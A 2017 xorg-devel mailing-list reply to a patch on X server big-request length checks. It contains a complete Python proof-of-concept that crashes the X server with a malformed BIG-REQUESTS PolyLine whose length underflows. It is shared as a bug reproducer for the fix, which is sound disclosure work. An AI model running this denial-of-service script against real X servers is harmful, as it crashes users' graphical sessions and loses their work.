Re: [PATCH] os: Make sure big requests have sufficient length.

Fri, 07 Jul 2017 08:09:06 -0700 

Here is a script that can be used to crash X server using a broken big request 
for PolyLine. It connects to DISPLAY=:1 and doesn't support authentication. 
Look inside the script for more details.

Other requests could be used to crash X server in similar way, for example 
SetFontPath.

Michal Srb
#!/usr/bin/env python

# This script crashes X server by sending a PolyLine request as a big request with incorrect length.
# The length underflows in X server, so it seems that the received request is huge.
# X server then tries to swap all elements inside the giant PolyLine request, eventually triggering segfault.

# Other requests could be used to crash X server in similar way, for example SetFontPath.

# Author: Michal Srb <m...@suse.com>
# License: MIT


# ---------- Configure this ----------

# Display to connect to
display_number = "1"
display_socket = "/tmp/.X11-unix/X" + display_number

# BIG-REQUESTS extension id
big_requests_extension = 133

# ------------------------------------


import struct
import socket

# Connection initiation
data = struct.pack(
  ">cxHHHHxx", # xConnClientPrefix
  'B',         # .byteOrder        = Big endian
  11,          # .majorVersion     = 11
  0,           # .minorVersion     = 0
  0,           # .nbytesAuthProto  = None # TODO: Support authentications
  0            # .nbytesAuthString = None # TODO: Support authentications
)

# Enable big requests
data += struct.pack(
  ">BBH",                 # xBigReqEnableReq
  big_requests_extension, # .reqType = XBigReqCode
  0,                      # .brReqType = X_BigReqEnable
  1                       # .length = 1 * 4B = 4B
)

# PolyLine as big request
data += struct.pack(
  ">BBHIII",   # xPolyLineReq
  65,          # .reqType      = Poly Line request
  0,           # .coordMode    = whatever
  0,           # .length       = 0 -> big request!
  0,           # .length (big request) = 0 ... XXX This will underflow!
  0,           # .drawable     = whatever
  0,           # .gc           = whatever
)

# Send it
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(display_socket)
s.sendall(data)
s.recv(1)
s.close()

_______________________________________________
xorg-devel@lists.x.org: X.Org development
Archives: http://lists.x.org/archives/xorg-devel
Info: https://lists.x.org/mailman/listinfo/xorg-devel

Reply via email to